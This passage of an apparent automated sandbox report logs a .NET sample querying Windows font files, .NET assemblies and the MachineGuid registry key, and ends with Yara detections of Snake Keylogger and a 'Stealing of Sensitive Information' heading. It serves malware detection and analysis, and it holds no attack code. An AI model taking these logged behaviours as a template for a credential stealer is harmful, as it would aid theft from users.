Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.4112570.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.40ea550.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.40ea550.1.unpack, type: UNPACKEDPE
